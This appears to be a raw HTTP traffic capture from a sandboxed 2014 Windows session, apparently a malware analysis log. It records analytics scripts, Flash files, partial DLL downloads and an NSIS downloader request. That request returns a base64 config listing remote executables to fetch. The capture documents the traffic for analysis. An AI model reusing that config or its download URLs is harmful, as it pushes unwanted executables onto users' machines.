, 13 Jun 2014 18:29:25 GMT..Cache-Control: max-age=3600..Accept-Ranges
: bytes..



GET /sync.htm?cproid=49F93F86C60D03A8D23F3919153C48A7:FG=1 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://pos.baidu.com/ecom?cec=utf-8&dai=3&cfv=11&cpa=1&col=en-us&dis=0&xuanting=0&n=67025059_1_cpr&conOP=0&scale=&skin=&rsi0=728&rsi1=90&rsi5=4<r=<u=http://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960&pcs=758x450&rss0=#FFFFFF&rss1=#FFFFFF&rss2=#0000FF&rss3=#444444&rss4=#008000&rss5=&rss6=#e10900&rss7=&rad=&pis=10000x10000&aurl=&psr=1276x846&pss=758x493&tpr=1402680537275&lunum=6&ch=0&at=6&qn=18a90fef6d4567e7&ps=357x3&tn=text_default_728_90&ts=1&td_id=1537506&adn=3&cad=1&ccd=32&dtm=BAIDU_DUP2_SETJSONADSLOT&dc=2&di=u1537506
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cpro.baidustatic.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Jun 2014 17:29:05 GMT
Content-Type: text/html
Last-Modified: Wed, 07 May 2014 11:40:06 GMT
Transfer-Encoding: chunked
Connection: close
P3P: CP=" OTI DSP COR IVA OUR IND COM "
Content-Encoding: gzip
37d.............VQo.6.~..`.. 3.Z.=.v.......d.C...E.mn.$.T.....QtmI.\..
.lQ....w..9z}.qz....,.*{.j...?..h.2}7..GC...:...V.]:..%...... .. .;=..
*.......s#[email protected]^..."',..[K.i.P5-T....e@:....1.k_....V..u."...........j.
..9......(.....6".........0.T...kc.t.....z..D.p...Ow0..:......(..H.u..
..^....aq.P2..<.N./$./.../......o8...@1%v5........I_.....%..29...c{
......./=....# 1.R......Z%`(..k....E.....=9G.".<.n..X*...GH.6.G.R.S
...5Q.eR..-...!..zg#<#..S0.z.sV...W.......|..lu%.s%u.L.z.t..P..*.A5
.i.>...Lv%.s...I...63.......P.7....." ..'b.....Ub.ao.XI..,9L...2...
dBRPE.../......#).,G0..1h x......I.P.r}(..L.E..........u-7`|.].&.X...f
.,F.g1.(Nb.o...R....d........2:...xyN.1.dnZ.N>d...z.M.........H.N .
...;g..t.A....j.9!..........3..^&.....ZoZ.M....G..H...Jv..o..fz.Q7....
-...W.....,..y.v. ..../.i....1...s..>....[.&.u.?..6...*....3.q.../.
;.I.|.o..>.I..Rv....c.)'.v.2f.Q&.98..L..C.......Uc..kh....ps}.WZ...
...........0..



GET /stat.php?id=2701879&web_id=2701879 HTTP/1.1
Accept: */*
Referer: hXXp://tv.aiqingzhihui.com/zhibo2.html?id=pczh_107_306.exe&en=1320146&go=
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s6.cnzz.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine
Date: Fri, 13 Jun 2014 17:28:47 GMT
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Fri, 13 Jun 2014 17:28:47 GMT
Expires: Fri, 13 Jun 2014 18:58:47 GMT
1f7a..(function(){function l(){this.c="2701879";this.R="z";this.N="";t
his.K="";this.M="";this.o="1402680527";this.P="hzs17.cnzz.com";this.L=
"";this.s="CNZZDATA" this.c;this.r="_CNZZDbridge_" this.c;this.G="_cnz
z_CV" this.c;this.u="0";this.B={};this.a={};this.la()}function g(a,b){
try{var c=[];c.push("siteid=2701879");.c.push("name=" d(a.name));c.pus
h("msg=" d(a.message));c.push("r=" d(h.referrer));c.push("page=" d(f.l
ocation.href));c.push("agent=" d(f.navigator.userAgent));c.push("ex=" 
d(b));c.push("rnd=" Math.floor(2147483648*Math.random()));(new Image).
src="hXXp://jserr.cnzz.com/log.php?" c.join("&")}catch(e){}}var h=docu
ment,f=window,d=encodeURIComponent,k=decodeURIComponent,p=unescape,r=e
scape,m="https:"===f.location.protocol?"https:":"http:",s=m "//c.cnzz.
com/core.php";l.prototype={la:function(){try{this.U(),.this.J(),this.i
a(),this.H(),this.m(),this.ga(),this.fa(),this.ja(),this.j(),this.ea()
,this.ha(),this.ka(),this.ca(),this.aa(),this.da(),this.qa(),f[this.r]
=f[this.r]||{},this.ba("_cnzz_CV")}catch(a){g(a,"i failed")}},oa:funct
ion(){try{var a=this;f._czc={push:function(){return a.C.apply(a,argume
nts)}}}catch(b){g(b,"oP failed")}},aa:function(){try{var a=f._czc;if("
[object Array]"==={}.toString.call(a))for(var b=0;b<a.length;b  ){v
ar c=a[b];switch(c[0]){case "_setAccount":f._cz_account="[object Strin
g]"===.{}.toString.call(c[1])?c[1]:String(c[1]);break;case "_setAutoPa
geview":"boolean"===typeof c[1]&&(f._cz_autoPageview=c[1])}}}catch(e){
g(e,"cS failed")}},qa:function(){try{if("undefined"===typeof f._cz
<<< skipped >>>


GET /crossdomain.xml HTTP/1.1
Accept: */*
Accept-Language: en-US
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: sm.kukuplay.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Fri, 13 Jun 2014 17:29:17 GMT
Content-Type: application/xml
Content-Length: 122
Connection: keep-alive
Vary: Accept-Encoding
ETag: W/"245-1384812173000"
Last-Modified: Mon, 18 Nov 2013 22:02:53 GMT
X-Upstream-IP: 172.16.18.17:8494
Content-Encoding: gzip
Accept-Ranges: bytes
Age: 61756
X-Cache: hit
Server: eJxLz8/XS8/RNzUuT0/1BgAfuARs
[email protected].......(.N;BJ....I......8..@.^......2...3R......P
?..7..e..0.....B...U.W.G....E.'..1....=.~.w.%g.V........


GET /SrcManager/ForbiddenTiming?op=getjson&types=comment&cid=693619_1371525642501&host=tv.aiqingzhihui.com HTTP/1.1


Accept: */*
Accept-Language: en-US
Referer: hXXp://resource.ws.kukuplay.com/players/2014/05/23/60130//fengyun.swf
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: sm.kukuplay.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Fri, 13 Jun 2014 17:29:17 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 50
Connection: keep-alive
Vary: Accept-Encoding
Cache-Control: max-age=60
X-Upstream-IP: 172.16.18.17:8494
Content-Encoding: gzip
Accept-Ranges: bytes
Age: 54
X-Cache: hit
Server: eJxLz8/XS8/RNzUuT0/1BgAfuARs
...........VPJ...M. QR.R.VP*.I,)-.qJ.JSkk.....!...HTTP/1.1 200 OK..Dat
e: Fri, 13 Jun 2014 17:29:17 GMT..Content-Type: text/html;charset=UTF-
8..Content-Length: 50..Connection: keep-alive..Vary: Accept-Encoding..
Cache-Control: max-age=60..X-Upstream-IP: 172.16.18.17:8494..Content-E
ncoding: gzip..Accept-Ranges: bytes..Age: 54..X-Cache: hit..Server: eJ
xLz8/XS8/RNzUuT0/1BgAfuARs.............VPJ...M. QR.R.VP*.I,)-.qJ.JSkk.
....!.......


GET /SrcManager/channelInfo?fields=online&cid=693619_1371525642501 HTTP/1.1


Accept: */*
Accept-Language: en-US
Referer: hXXp://resource.ws.kukuplay.com/players/2014/05/23/60130//fengyun.swf
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: sm.kukuplay.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Fri, 13 Jun 2014 17:29:19 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=60
X-Upstream-IP: 172.16.18.17:8494
Age: 54
X-Cache: hit
Server: eJxLz8/XS8/RNzUuT0/1BgAfuARs
Content-Encoding: gzip
...........VP..LQR.RP2.463..7467452531250TR.QP.....K..15.4....hQ......
.F.....



GET /sw-search-sp/client/dlljg1/BDMNet.dll HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dlsw.baidu.com
Range: bytes=851968-
Referer: hXXp://dlsw.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.1 206 Partial Content
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:29:15 GMT
Content-Type: application/x-msdownload
Connection: close
Content-Length: 392640
Content-Range: bytes 851968-1244607/1244608
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length
Accept-Ranges: bytes
Last-Modified: Wed, 21 Aug 2013 08:14:12 GMT
Expires: Sat, 14 Jun 2014 07:46:32 GMT
x-bs-version: 3DB44104797F6F34C7AB9E0A496537CC
ETag: 6812edbc825d28224d79d3645c9bb0f6
x-bs-request-id: MTAuMjE1Ljg4LjM2OjgwODA6MjQzNDMzNTU2MDoxMS9KdW4vMjAxNCAxNTo0NjozMiA=
x-bs-meta-crc32: 440605594
Content-MD5: 6812edbc825d28224d79d3645c9bb0f6
x-bs-client-ip: MTE1LjIzMS40Mi4xODE=
................U..j.h....h....d.....P..0SVW.D7..1E.3.P.E.d......e..u.
.V..U....t.3..M.d......Y_^[..].d......H..M.;.r.;P.r..~..}..........3.3
.....1...t.;.s..y..t............;.v...t..M..A.;E.r.;.s...%.....E.3....
..;...A...........<.....;]...~....E.....W.................E.P.M..9.
..............M..Q. .RW.................E.........P...................
<....E.9......tH.......q...|*........9......t....y...........<..
.....}....}...........q.........3.............$.......................
.....<............;.~.......M.....3.=...........e..E.HTTP/1.1 206 P
artial Content..Server: JSP2/1.0.27..Date: Fri, 13 Jun 2014 17:29:15 G
MT..Content-Type: application/x-msdownload..Connection: close..Content
-Length: 392640..Content-Range: bytes 851968-1244607/1244608..Access-C
ontrol-Allow-Origin: *..Access-Control-Allow-Methods: HEAD, GET, OPTIO
NS, PUT, POST, DELETE..Access-Control-Expose-Headers: Content-Length, 
ETag, x-bs-request-id, x-pcs-request-id..Access-Control-Allow-Headers:
 Range, Origin, Content-Type, Accept, Content-Length..Accept-Ranges: b
ytes..Last-Modified: Wed, 21 Aug 2013 08:14:12 GMT..Expires: Sat, 14 J
un 2014 07:46:32 GMT..x-bs-version: 3DB44104797F6F34C7AB9E0A496537CC..
ETag: 6812edbc825d28224d79d3645c9bb0f6..x-bs-request-id: MTAuMjE1Ljg4L
jM2OjgwODA6MjQzNDMzNTU2MDoxMS9KdW4vMjAxNCAxNTo0NjozMiA=..x-bs-meta-crc
32: 440605594..Content-MD5: 6812edbc825d28224d79d3645c9bb0f6..x-bs-cli
ent-ip: MTE1LjIzMS40Mi4xODE=..................U..j.h....h....d.....P..
0SVW.D7..1E.3.P.E.d......e..u..V..U....t.3..M.d......Y_^[..].d....
<<< skipped >>>


GET /core.php?web_id=2701879&t=z HTTP/1.1
Accept: */*
Referer: hXXp://tv.aiqingzhihui.com/zhibo2.html?id=pczh_107_306.exe&en=1320146&go=
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: c.cnzz.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine
Date: Fri, 13 Jun 2014 17:28:48 GMT
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Fri, 13 Jun 2014 17:28:48 GMT
Expires: Fri, 13 Jun 2014 17:43:48 GMT
320..!function(){var a,b,c,d=encodeURIComponent,e="2701879",f="",g="",
h="online_v3.php",i="hzs17.cnzz.com",j="1",k="text",l="z",m="站&
#38271;统计",n=window["_CNZZDbridge_" e].bobject,o="https:
"==document.location.protocol?"https:":"http:",p="0",q=o "//online.cnz
z.com/online/" h,r=[];r.push("id=" e),r.push("h=" i),r.push("on=" d(g)
),r.push("s=" d(f)),q ="?" r.join("&"),"0"===p&&n.callRequest([o "//cn
zz.mmstat.com/9.gif?abc=1"]),j&&(""!==g?n.createScriptIcon(q,"utf-8"):
(b="z"==l?"hXXp://VVV.cnzz.com/stat/website.php?web_id=" e:"hXXp://qua
njing.cnzz.com","pic"===k?(c=o "//icon.cnzz.com/img/" f ".gif",a="<
a href='" b "' target=_blank title='" m "'><img border=0 hspace=
0 vspace=0 src='" c "'></a>"):a="<a href='" b "' target=_b
lank title='" m "'>" m "</a>",n.createIcon([a])))}();...0..HT
TP/1.1 200 OK..Server: Tengine..Date: Fri, 13 Jun 2014 17:28:48 GMT..C
ontent-Type: application/javascript..Transfer-Encoding: chunked..Conne
ction: keep-alive..Last-Modified: Fri, 13 Jun 2014 17:28:48 GMT..Expir
es: Fri, 13 Jun 2014 17:43:48 GMT..320..!function(){var a,b,c,d=encode
URIComponent,e="2701879",f="",g="",h="online_v3.php",i="hzs17.cnzz.com
",j="1",k="text",l="z",m="站长统计",n=window["
_CNZZDbridge_" e].bobject,o="https:"==document.location.protocol?"http
s:":"http:",p="0",q=o "//online.cnzz.com/online/" h,r=[];r.push("id=" 
e),r.push("h=" i),r.push("on=" d(g)),r.push("s=" d(f)),q ="?" r.join("
&"),"0"===p&&n.callRequest([o "//cnzz.mmstat.com/9.gif?abc=1"]),j&
<<< skipped >>>


GET /sw-search-sp/client/dlljg1/BDMNet.dll HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dlsw.baidu.com
Range: bytes=688128-
Referer: hXXp://dlsw.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.1 206 Partial Content
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:29:02 GMT
Content-Type: application/x-msdownload
Connection: close
Content-Length: 556480
Content-Range: bytes 688128-1244607/1244608
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length
Accept-Ranges: bytes
Last-Modified: Wed, 21 Aug 2013 08:14:12 GMT
Expires: Sat, 14 Jun 2014 07:46:32 GMT
x-bs-version: 3DB44104797F6F34C7AB9E0A496537CC
ETag: 6812edbc825d28224d79d3645c9bb0f6
x-bs-request-id: MTAuMjE1Ljg4LjM2OjgwODA6MjQzNDMzNTU2MDoxMS9KdW4vMjAxNCAxNTo0NjozMiA=
x-bs-meta-crc32: 440605594
Content-MD5: 6812edbc825d28224d79d3645c9bb0f6
x-bs-client-ip: MTE1LjIzMS40Mi4xODE=
......$......$......$....r..L$`Q........9t$<.|$t.\$p.\$`r..T$(R....
....9t$X.|$<.\$8.\$(r..D$DP.~......9.$......q.....$....Q.\.........
.u|....tv.L$....B.WU....te..$....Q.T$(h4...R.. ..h....P.D$TP..$.......
 [email protected]$$.,.....$..... .........O.....T.....
ht....L$DuP......T$@R....$......Z....L$@..$..........D$.WPU...,.......
......$..........w....>....L$@Q....$......:[email protected]$...$.........8
\$...........u3h.o...L$D......T$@R....$......D$.............D$..u..\$.
.D$....$....t..d$...L$@.#....D$.WP..U.....8\$................I.hXc...L
$(......L$$Q....$......N....|$<..D$...$....r..T$(R........8\$.uzh.H
...L$(.;....D$$P....$......7....|$<..D$...$....r..L$(Q.<......8\
$........T$.WRU... .......X.....$.....L............R...h.&...L$(......
L$...L$$Q....$............u*h.H...L$D......L$...T$@R....$.........Z...
[email protected]$....$....t..L$$.......88_.tT..$....P.L$(h....Q
[email protected]$$.b.....$.
....V.........................j.hx>..d.....P...SUVW.D7..3.P.D$$d...
.....\$4...PD....3....t$..t$..t$ ...P(.L$.QS...t$4....$.....L$...t$.D$
. ....;.s..D$8...PQWS...I.........T$8..R.P.S....P........D$...t.P.P...
....L$$d......Y_^][............j.h.>..d.....P.......D7..3...$....SU
VW.D7..3.P..$....d.......$4.....$<.....$,...3..\$..p..4..T.........
...$0....l$........$......x...1u...$8...WP......R....PR.V,..P..$....P.
.......P....$(........Y.....$..........O....x...1u...$8...WPR.........
.P.F0R..RP.L$xQ.)......P....$(.............L$p.J.........p.....1u.
<<< skipped >>>


GET /crossdomain.xml HTTP/1.1
Accept: */*
Accept-Language: en-US
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: player.log.kukuplay.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: ngx_openresty/1.2.6.6
Date: Fri, 13 Jun 2014 17:29:17 GMT
Content-Type: text/xml
Content-Length: 257
Last-Modified: Fri, 13 Jun 2014 08:53:44 GMT
Connection: keep-alive
Accept-Ranges: bytes
<?xml version="1.0"?>.<!DOCTYPE cross-domain-policy SYSTEM "/
xml/dtds/cross-domain-policy.dtd">.<cross-domain-policy> .   
<site-control permitted-cross-domain-policies="master-only"/>.  
 <allow-access-from domain="*" to-ports="*" />.</cross-domain
-policy>......


GET /report.gif?act=pv&ver=nor&app=player&url=http://tv.aiqingzhihui.com/zhibo2.html?id=pczh_107_306.exe&en=1320146&go=&cid=fengyun_693619_1371525642501&host=tv.aiqingzhihui.com&device=pc&localId=1402680558.822_176117610932921373056&rd=0.27252255426719785 HTTP/1.1


Accept: */*
Accept-Language: en-US
Referer: hXXp://resource.ws.kukuplay.com/players/2014/05/23/60130//fengyun.swf
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: player.log.kukuplay.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: ngx_openresty/1.2.6.6
Date: Fri, 13 Jun 2014 17:29:17 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: keep-alive
Set-Cookie: _uid=1402680557.68_2fe60695dfa19d591864636e3c8bc4f7; domain=log.kukuplay.com; path=/; expires=Wed, 30-Oct-2041 01:29:17 GMT
Set-Cookie: _sid=1402680557.68_f8d1aea4016e759e5b384fb00ac175b7; domain=log.kukuplay.com; path=/
Set-Cookie: _lsid=1402680557.68_af26cdb3012cf2906855de60fe555a56; domain=log.kukuplay.com; path=/; expires=Sat, 14-Jun-2014 01:59:17 GMT
Set-Cookie: _appStartId=1402680557.68_6ea034ac2a26b55ab4fcb52f40ad456b; domain=player.log.kukuplay.com; path=/; expires=Wed, 30-Oct-2041 01:29:17 GMT
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Expires: Fri, 01 Jan 1980 00:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, max-age=0, must-revalidate
GIF89a.............!.......,...........L..;HTTP/1.1 200 OK..Server: ng
x_openresty/1.2.6.6..Date: Fri, 13 Jun 2014 17:29:17 GMT..Content-Type
: image/gif..Content-Length: 43..Last-Modified: Mon, 28 Sep 1970 06:00
:00 GMT..Connection: keep-alive..Set-Cookie: _uid=1402680557.68_2fe606
95dfa19d591864636e3c8bc4f7; domain=log.kukuplay.com; path=/; expires=W
ed, 30-Oct-2041 01:29:17 GMT..Set-Cookie: _sid=1402680557.68_f8d1aea40
16e759e5b384fb00ac175b7; domain=log.kukuplay.com; path=/..Set-Cookie: 
_lsid=1402680557.68_af26cdb3012cf2906855de60fe555a56; domain=log.kukup
lay.com; path=/; expires=Sat, 14-Jun-2014 01:59:17 GMT..Set-Cookie: _a
ppStartId=1402680557.68_6ea034ac2a26b55ab4fcb52f40ad456b; domain=playe
r.log.kukuplay.com; path=/; expires=Wed, 30-Oct-2041 01:29:17 GMT..P3P
: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT
'..Expires: Fri, 01 Jan 1980 00:00:00 GMT..Pragma: no-cache..Cache-Con
trol: no-cache, max-age=0, must-revalidate..GIF89a.............!......
.,...........L..;..
<<< skipped >>>


GET /0403/help1.html HTTP/1.0
Host: update.aiqingzhihui.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Date: Fri, 13 Jun 2014 17:28:33 GMT
Content-Length: 570
Content-Type: text/html
Last-Modified: Wed, 11 Jun 2014 03:51:53 GMT
Connection: Close
ETag: "f48b947b2885cf1:2011"
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Fw-Via: MISS from ctl-zj-033-088.fcd, DISK HIT from ctl-gd-117-187.fcd
HTTP/1.1 200 OK..Date: Fri, 13 Jun 2014 17:28:33 GMT..Content-Length: 
570..Content-Type: text/html..Last-Modified: Wed, 11 Jun 2014 03:51:53
 GMT..Connection: Close..ETag: "f48b947b2885cf1:2011"..Accept-Ranges: 
bytes..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Fw-Via: MISS 
from ctl-zj-033-088.fcd, DISK HIT from ctl-gd-117-187.fcd..TRW2VjdF0KO
Tc9MQo5OD0xCjk5PTEKMTAwPTEKMTAxPTEKMTAyPTEKMTAzPTEKMTA0PTEKMTA1PTEKMTA
2PTEKMTA3PTEKMTA4PTEKMTA5PTEKMTEwPTEKMTExPTEKMTEyPTEKMTEzPTEKMTE0PTEKM
TE1PTEKMTE2PTEKMTE3PTEKMTE4PTEKMTE5PTEKMTIwPTEKMTIxPTEKMTIyPTEKMTIzPTE
KMTI0PTEKMTI1PTEKMTI2PTEKMTI3PTEKMTI4PTEKMTI5PTEKMTMwPTEKMTMxPTEKMTMyP
TEKMTMzPTEKMTM0PTEKMTM1PTEKMTM2PTEKMTM3PTEKW3JlY10KMD1odHRwOi8vZG93bi5
sYW9jaGVoZS5jb20vMDUyMy9wY3l5XzY4XzIuZ2lmCjE9aHR0cDovL2NkbjEuZG93bi4xN
zE3M2llLmNvbS9pZS9kb3dubG9hZGVyL194aHptMDZfcy5leGUKW2Rpcl0KMD1wY3l5XzY
4XzIuZXhlCjE9X3hoem0wNl9zLmV4ZQpbZ10KMD0xCltwYV0KMD0xCltlZF0KRTA9MQ==.
.



GET /players/2014/05/23/60130//fengyun.swf HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hXXp://mini.fengyunzhibo.com/mini/fymini.htm?f=aiqingzhihui&code=null
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: resource.ws.kukuplay.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Expires: Tue, 28 May 2024 16:39:04 GMT
Date: Sat, 31 May 2014 16:39:04 GMT
Server: pws/1.4.2.9
Content-Type: application/x-shockwave-flash
Content-Length: 130667
Last-Modified: Fri, 23 May 2014 04:54:54 GMT
ETag: "537ed49e-1fe6b"
Cache-Control: max-age=315360000
Accept-Ranges: bytes
Age: 1
X-Via: 1.1 zjjhdx35:8107 (Cdn Cache Server V2.0), 1.1 dls22:0 (Cdn Cache Server V2.0)
Connection: keep-alive
CWS.:...x....TT../[email protected].....)..i..F.A......~..}
.Z.......ne...y.....93s...). ...*[email protected]......*....l...%x
y===y<.y...^~qqq^>.^..np...7........&sF.....a..f..1!...pw7i6.?T.
,.E....xF......u...\y.y.ABV...p...........9......-.......m.h.j .{1.9..
...*#g...2):B.........>...lu!...e.#g.X..x..p wKP&k.....S.$..-..\m..
.w....y....9...5w..........0.ws.....Y...g2..Ae..........e@6I.......jO.
.E..&...............1....r.).M.Tw...H3k(........&G9.EDL.`cA0q0p....Q.P
.O...}...-...XP....t.`..8%..n......[[email protected]@/[email protected]...... 
 .....%..<....`..u.....!..i`..XX..........>>hm`?..a......y..\
.. .? .....z.Z.......`.`[email protected].,....c...r..7..<.....c
........?1P.D.,..O......=\...\....c....3.....b.H.......V..B...eM&e..S]
[email protected].:.x..:wg.Q..z.}..:[email protected]...~.f...ht
..&... ..D.q%&.......7Rw.Tl...PgnWY.'...w...........\..B)...B7........
$....3q...I,w.Uw.Wr..0.....xi.,.rP]$.4:}../..c...I...!M.|A:.VU.....I..
..bK.R_7...`...........d.# .....JG..ma\._.......Lo.#..C7.....R.....<
;..6...E...M.4VH.{W).I}...F....".HU{w.t]..H=..2..!.HwzO.].^..[...RN..*
........v.I"}Q....j.9...h...=.<#..H.....V........k...j..7U..cj.8#2.
.E..tp.........}...KK(..Naj.u..RkQ.t.!.8cNg.].....y..i=a.....t*..;s..2
...\v3b...O-d=.}.u.Ss.?......\.."..Mq[.>...ZgN?7t.lI........`.S...:
Z..i.........8w>u.Z..X.U.-n.........d.W...eckd?.Kfw.LWE...{zL...n..
y...1.m$/.X.D...S^...P.Q.C12.].mc.~5%8....:..Q..*[.dA.Q0.*...o ... ...
...^..y.....m'uC.O2W.p......n..q:t:...QTV.c.r..r:..9Lt.lLtt.&...&&
<<< skipped >>>

GET /plugins/requestviewrlv10.swf HTTP/1.1


Accept: */*
Accept-Language: en-US
Referer: hXXp://resource.ws.kukuplay.com/players/2014/05/23/60130//fengyun.swf
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: resource.ws.kukuplay.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Expires: Tue, 28 May 2024 17:12:00 GMT
Date: Sat, 31 May 2014 17:12:00 GMT
Server: pws/1.4.2.9
Content-Type: application/x-shockwave-flash
Content-Length: 3448
Last-Modified: Sat, 08 Feb 2014 03:56:53 GMT
ETag: "52f5ab05-d78"
Cache-Control: max-age=315360000
Accept-Ranges: bytes
Age: 1
X-Via: 1.1 lz150:8106 (Cdn Cache Server V2.0), 1.1 dls21:0 (Cdn Cache Server V2.0)
Connection: keep-alive
CWS.A...x..8{l..}......!..LI.dR...)...;RlY.^.-..$..kY<.w.Y$......F.
..Y7 k.#}[email protected](.%.Pl..e.R`..8[..{5A.....-......#%Q............;r... T
.m.j1...!...z.#t<.P.fF..k.T.......if.zzVWW.W....R......poOoo.pt...S
^........Q........ [.1=o.ho/iM...f....2..QRJZ..F.....(..P.\Z6..l6..e..
g..H...UyE.RS..<....dL.L)...=...S.Z.HpxG....0.....e...tw\O.dsz"...T
Pe...0..|,..I%7..,g.....,......wsl..=%g....286m...............z.......
L.K.H. .u.#w.......v.. ...w. ....V.(d.};.qQU2K...bNy2........R?.1...}h
......?.>.p..@..]....... .....q.......w..g.....x...#.....M..O...|..
.....w?m..g.m....?.../o..o......?Z.......n..OF..?.........G.k...$.;7..
3....1..................O.w?z.v.QCz....'_{..k..{.6...Uw...z..DE.....|.
..g...8..?.9..v.....?.<....C7~....7.={..[...:}.....y....|.r.gS.....
_....CW.{o.........o......`J..'?;...~..Z...|t..~....ZX.....F.T....A..C
.....~<...L.......i.x.......a...44.&/........)...C.Tu.......35C..I.
.r*o.z......L!5'......Anc.S..ob7..{K.K.k8a\.....d.H.5sZf.euVwB3.)y.5Z|
Fb7..).....%.E>e...}NK .1.....f*.......b......9.(s.QVv5e..2|e..w.9:
.....u.^.A.&.U....R..R.`a*..s........"..X..$.5N..L.2k.9s.gc3. 6<...
ZB.s..=..N....u{..(.bV.#..R$..l.(Y=g...]..#.C./.u..ZF...q...G......EU.
..s1-g.r.....Z.L...tL.....-%M.X.ei..S3....,.L......J:..2:Pf...8.X.RM..
...m.J<....;.r*....i.%.M...q...U.S........T..;Cxx...7.>...k)S...
...... ...R.o.zVL..f.zW.....e7rWM.l. ..i2c*99nj J....P.P......]6.p.T~f
.....h.|....sJ..m.2Rr...DN.q=..-M..oB.......j.9..,.(KckY.:...f~HS...g.
B0-..?t..9KI..d....W.%8s...3Sv.f..)....Z..p..KV..B...P..\N....cEd.
<<< skipped >>>


GET /go/full/1/70745 HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: w.x.baidu.com
Referer: hXXp://w.x.baidu.com/
